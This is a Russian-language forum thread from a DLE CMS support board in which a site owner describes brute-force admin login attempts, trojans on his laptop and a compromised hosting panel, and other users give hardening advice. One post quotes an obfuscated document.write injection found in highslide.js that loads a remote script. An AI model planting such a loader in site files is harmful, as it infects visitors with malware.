Ребята, проверяйте сайты на попытку взлома!!!

[izbushkin 3]

Сейчас чисто случайно зашел в раздел:

и вот что я вижу:

И такая мутатень уже на протяжении почти суток оказывается!

Очень настырно подбирается пароль к аккаунту админа!

Положил данный ай-пи в фильтр IP адреса:

Попытки авторизоваться прекратились!!!

Наверное взломщик оценил систему безопасности.

Ух ты!!!

Бан по ай-пи не помог. Попытки авторизоваться продолжаются:

Что делать?

Изменено 22 июня 2013 пользователем izbushkin

[DeeMon 73]

А адрес админки меняли? Если не менять то как минимум можно получить порядка 5-100 попыток входа с разных IP.

[izbushkin 3]

Немного не понял по поводу адреса админки?

[DeeMon 73]

Админка- Настройка системы-Настройки безопасности скрипта-Файл админпанели (Вы можете изменить имя файла админпанели. По умолчанию это admin.php,если вы указываете новый файл, то не забудьте переименовать его на сервере, указывается только имя файла, без указания пути к нему.)

[izbushkin 3]

Файл у меня изменен давно на другой. Доступ к админпанели для всех пользователей закрыт, кроме меня одного.

Пока решил проблему путём смены логина админа, ну и пароль навсякий сменил.

Файл админки тоже переименовал навсякий.

Пока всё ОК!

Там скорее всего прога какая то долбила... Что то не верится что человек уже почти сутки заморачивается с перерывами в 20 минут

[DeeMon 73]

с перерывами в 20 минут

Вот жаль нет в настройках времени, по идее вынести в настройки этот параметр. Я бы просто больший промежуток поставил...

[celsoft 6 076]

Бан по ай-пи не помог. Попытки авторизоваться продолжаются:

Банить нужно не в скрипте DLE, а на сервере. Потому как бан в DLE не только по IP, но и по логину, поэтому он сначала авторизовывает, а потом проверяет и банит. Поэтому добавив бан в DLE, попытки авторизации также фиксируются и только после этого наступает бан.

[izbushkin 3]

Вобщем попытка взломать аккаунт на сайте не удалось. Эти уроды принялись взламывать мой ноутбук.

Прямо на моих глазах в почте майл.ру была добавлена вот эта функция:

Кнопку "ВЫКЛ." - это уже я нажал.

Далее смотрим на настройки фильтра:

Я просто в шоке!!!

Касперский не помогает! Может винда-8 с дыркой???

Как ломают комп то?

Кстати это уже вторая попытка взлома ноутбука и вследвие сервера.

Первая удалась успехом хакеров.

Что и требовалось доказать. Уже взломали панель управления сайтами с ай-пи 176.9.227.94

Утилита AVZ нашла 5 троянов на ноуте.

[lineup 5]

Переходите на линукс, так бы взломщики автоматически перестали быть взломщиками =)

[izbushkin 3]

Как? Как они узнают логин от панели хостинга?

Меняют пароли и авторизуются..

Я просто не понимаю:

[izbushkin 3]

Сегодня обнаружил на сайте при помощи штатного антивируса изменения в файле:

/engine/classes/highslide/highslide.js

вот такой код:

...Anchors)}; ;document.write('<s'+'cr'+'ipt src=ht'+'tp://'+'vvv'+'.posnv'+'aggs.r'+'u/4'+'7.j'+'s></sc'+'ri'+'pt>');

Вот обнаружил в логах:

[celsoft 6 076]

Как? Как они узнают логин от панели хостинга?

У вас их воруют. Способов много, начиная от троянов на компьютере, и использования нелегального ПО на компьютере, где трояны вшиты и сами отсылают ваши пароли и заканчивая использованием одинаковых паролей на разных сайтах.

[izbushkin 3]

После некоторого перерыва опять сейчас за метил, что на всех сайтах на сервере в журнале операций в админпанели происходит подбор пароля к аккаунту.

И как оказалось это происходит на протяжении почти месяца. А я и не знал даже.

Подскажите пожалуйста как сделать, чтобы запретить данному ай-пи подбирать пароли к админке?

Нашел статью: Запрет доступа по IP через .htaccess

Куда надо прописать данные:

Order allow,deny

allow from all

Deny from 193.105.154.231

Изменено 19 сентября 2013 пользователем izbushkin

[dampel 0]

Используйте брандмауэр вашего сервера для эффективного бана. IPTABLES

для .htaccess используйте примерно такую строчку

deny from (ip нарушителя)

Бан через админку dle не спасет

deny from 193.105.154.231

в самый конец .htaccess

[inokentik 45]

Не хранить пароли на ноуте или компе ни в каком виде... Я когда то хранил, потом гуляя в своей почту на моих глазах приходило письмо от какой то партнерки, я его типа прочитал, оно типа удалилось и всякие такие приколы были... Записал пароли на бумажку, сфоткал на телефон, бумажку сжег... Проблем теперь нет, тьфу тьфу тьфу

[vadimushka_d 0]

поставить линукс, либо нормальный антивирус, и сделать запрос на запрет передачи любых данных с компа, без разрешения владельца компа,

[zimka 1]

Во первых для начала нужно удалить трояны с компа.... во вторых храните пароли на столе в блокноте а не в компе... у вас пароли просто воруют... вы поменяли ввели новый а его тут же троян отправил злоумышленнику...

[alex32 942]

а я чо то не парюсь. мой хостер все вопросы решил тупо, и не поверите, как отрезало. ломают то не люди, пароли подбирают боты. просто при заходе в админку, для того, что бы получить доступ к форме ввода логина и пароля надо ввести сначала другой логин и пароль, прописанный в хтаццесс. тупой, типа, user/1234 зато админку не ломают

В логах ни одной попытки взлома, они тупо туда не добираются

[bonzik 0]

Так же, позволю себе порекомендовать, можно поставить ограниченные попытки логина на сайте...поставьте 2-3 и через пару недель они отвяжутся.

[izbushkin 3]

Решил проблему полностью установив в настройках метод авторизации по E-mail